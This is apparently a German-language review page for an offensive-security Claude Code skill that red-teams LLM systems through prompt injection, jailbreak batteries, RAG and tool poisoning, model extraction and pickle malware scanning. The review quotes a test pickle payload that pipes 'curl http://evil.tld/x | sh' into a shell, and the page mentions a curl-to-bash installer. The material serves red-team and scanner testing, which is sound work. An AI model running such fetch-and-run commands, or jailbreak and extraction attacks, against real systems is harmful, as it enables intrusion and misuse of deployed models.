AI Security

Offensives Testen von LLM/ML-Systemen: Prompt Injection, RAG Poisoning, Pickle-Modell-Scanning

von hypnguyen1209 · hypnguyen1209/offensive-claude

Getestet · Funktioniert ★ 9.2/10

AI Security — Offensives Testen von LLM/ML-Systemen: Prompt Injection, RAG Poisoning, Pickle-Modell-Scanning

Was es kann

Eine Offensive-Security-Skill für das Red-Teaming von AI/ML-Systemen: Prompt Injection und Multi-Turn-Jailbreak-Batterien, RAG/Vector-DB-Poisoning, MCP/Agent-Tool-Poisoning-Audits, Pre-Load-Pickle-Modell-Malware-Scanning und Black-Box-Modell-Extraktions-/Membership-Inferenz-Probes, mit OWASP LLM Top-10 und MITRE ATLAS Mappings. Wird ausgelöst, wenn ein Benutzer darum bittet, ein LLM, einen Chatbot, eine RAG-Pipeline, einen MCP-Server oder ein heruntergeladenes Modellartefakt anzugreifen, zu red-teamen oder zu auditieren. Enthält fünf ausführbare Python-Skripte plus fünf Referenz-Deep-Dives, die auf spezifische CVEs von 2024-2025 zugeschnitten sind.

Testbericht

skills/ai-security/SKILL.md abgerufen und 3 gebündelte Dateien (promptinject_harness.py, rag_poisoner.py, prompt-injection-jailbreak.md) stichprobenartig überprüft – alle HTTP 200. Für die AUSGABE habe ich die nur-stdlib-Skripte/model_scan.py des Skills gegen von mir erstellte Pickles ausgeführt: ein bösartiges mit __reduce__ -> os.system("curl http://evil.tld/x | sh"), ein gutartiges und ein gutartiges, dessen Daten lediglich die Zeichenfolgen "operating_system"/"subprocess" enthielten. Die Baseline (naives Byte-Grep) kennzeichnete die bösartige Datei, aber auch FALSCH-POSITIV die gutartige Label-List-Datei. Der Skill zerlegte Pickle-Opcodes über pickletools, löste posix.system über REDUCE-Erreichbarkeit als eine verweigerte aufrufbare Funktion auf (strukturiertes JSONL: severity high, CWE-502, AML.T0011, exit code 2 als CI-Gate) und löschte beide gutartigen Dateien korrekt. Die Installation in einem sauberen mktemp HOME wurde verifiziert, wobei SKILL.md unter ~/.claude/skills/ai-security/SKILL.md platziert wird.

Getestet am: 2026-07-31 · Claude Code 2.x (agent harness)

Installation

git clone --depth 1 https://github.com/hypnguyen1209/offensive-claude.git /tmp/ai-security-src
mkdir -p ~/.claude/skills
cp -R /tmp/ai-security-src/skills/ai-security ~/.claude/skills/ai-security
# Verifies at ~/.claude/skills/ai-security/SKILL.md (bundles references/ + scripts/).
# Script deps vary: model_scan.py is stdlib-only; rag_poisoner.py needs sentence-transformers;
#   promptinject_harness.py + model_extractor.py need `pip install requests` and a live target endpoint.
# Repo-level plugin alternative (registers a SessionStart dispatcher hook — not needed for this skill alone):
#   /plugin marketplace add hypnguyen1209/offensive-claude
#   /plugin install offensive-claude@offensive-claude-marketplace
# NOTE: the README also offers `curl -sL .../install.sh | bash` — a curl|sh pipe; the manual cp above avoids it.

Befehle & Beispiel-Prompts

  • /ai-securityOffensives Testen von LLM/ML-Systemen: Prompt Injection, RAG Poisoning, Pickle-Modell-Scanning

Skills reagieren auf normale Anfragen — keine Slash-Befehle nötig. Nach der Installation aktivieren Prompts wie diese den Skill (auf Englisch):

  • Test this model against known jailbreak techniques
  • Check this RAG pipeline for vector poisoning
  • Run a model extraction attack against this API